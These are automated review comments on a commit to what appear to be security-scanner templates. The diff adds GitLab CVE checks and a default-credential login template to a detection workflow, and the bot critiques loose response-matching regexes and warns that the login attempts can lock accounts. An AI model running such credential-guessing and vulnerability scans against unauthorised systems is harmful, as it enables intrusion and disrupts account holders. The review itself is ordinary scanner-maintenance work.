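Review bot: The body regexes at L1721-L1727 (`username.*`, `id.*`, `name.*`) are unanchored substrings, so `id.*` is satisfied by words like `invalid` or `hidden` and `name.*` by any `name` in an error message, leaving the 200 and `application/json` checks as the only real gate and inviting false positives on JSON error bodies; match the keys instead, as gitlab-weak-login does with `'"access_token":'`, e.g. a `word` matcher with `- '"username":'`, `- '"id":'`, `- '"name":'` and `condition: and`. The `{{uid}}` placeholder (L1686) and the `§gitlab_user§` style in gitlab-weak-login (L639) are two syntaxes for the same thing in one commit; if both are supported, settle on one. `Connection: keep-alive` (L1701) also differs from the `Connection: close` the other raw requests in this commit use.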
|
|
@ -10,4 +10,8 @@ workflows:
|
|||
|
||||
- template: exposed-panels/gitlab-detect.yaml
|
||||
subtemplates:
|
||||
- template: misconfiguration/gitlab/
|
||||
- template: misconfiguration/gitlab/
|
||||
- template: vulnerabilities/gitlab/
|
||||
- template: cves/2020/CVE-2020-2096.yaml
|
||||
- template: cves/2021/CVE-2021-22214.yaml
|
||||
- template: default-logins/gitlab/gitlab-weak-login.yaml
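Review bot: Adding `default-logins/gitlab/gitlab-weak-login.yaml` (L1784) to the GitLab workflow means every run that detects GitLab now also submits login attempts, and that template's own comment warns GitLab locks a valid account for 10 minutes after 5 failures; the workflow should make this side effect visible, e.g. `# gitlab-weak-login submits login attempts; GitLab may temporarily lock an account on repeated failures.` The two `misconfiguration/gitlab/` lines at L1769 and L1772 are probably the page printing one unchanged line twice (the header is `-10,4 +10,8` with four additions), but if both are on the new side the directory is listed twice and should be deduplicated. The `workflows:` block starts before this hunk.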
|